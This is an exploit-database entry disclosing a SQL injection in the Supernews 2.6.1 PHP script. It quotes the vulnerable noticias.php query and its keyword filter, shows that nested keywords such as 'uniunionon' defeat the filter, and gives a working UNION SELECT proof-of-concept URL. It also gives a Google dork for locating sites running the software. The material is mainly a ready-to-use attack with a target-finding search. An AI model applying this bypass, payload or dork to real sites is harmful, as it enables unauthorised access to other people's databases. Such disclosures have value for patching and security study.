Supernews 2.6.1 - 'noticias.php?cat' SQL Injection

Author: Yakir Wizman
type: webapps
platform: php
port: 
date_added: 2012-05-31 
date_updated: 2012-05-31 
verified: 1 
codes: OSVDB-82416 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comSuperNews-2.6.1.zip

##########################################################################
## Supernews <= 2.6.1 (noticias.php cat) Remote SQL Injection
## Google Dork: intext:"2003 - 2004 : SuperNews : Todos os direitos reservados"
## Bug discovered by Pr0T3cT10n, <pr0t3ct10n@gmail.com>
## Date: 31/05/2012
## Version: 2.6.1
## Software Link: http://phpbrasil.com/script/vT0FaOCySSH/supernews
## ISRAEL
##########################################################################
##          Author will be not responsible for any damage.
##########################################################################
## Vulnerable Code - noticias.php [30-31]:
30.	$idcategoria = formatDados($_GET['cat']);
31.	$query = mysql_query("SELECT id, categoria FROM {$prefixdb}notcategorias WHERE id=$idcategoria ORDER BY categoria");

## NOTE:
## As you can see there is filter to variable $idcategoria.

## Function code - funcao.php [106-112]:
106.function formatDados($data) {
107.	$data = strip_tags($data);
108.	$data = trim($data);
109.	$data = get_magic_quotes_gpc() == 0 ? addslashes($data) : $data;
110.	$data = preg_replace("@(--|\#|\*|;|select|union|drop|insert|delete|xp_|\=| or |-shutdown|update| and |&|')@s", "", $data);
111.	return $data;
112.}

## As you can see, this function can be bypassed easily by the following example:
# string 'uniunionon' will replace to clean 'union'
# string 'seleselectct' will replace to clean 'select'

## SQL Injection PoC:
## http://www.example.com/noticias.php?cat=-1+uniunionon+seleselectct+1,version()--
##########################################################################
# Cya :)
# 0x31337.net
##########################################################################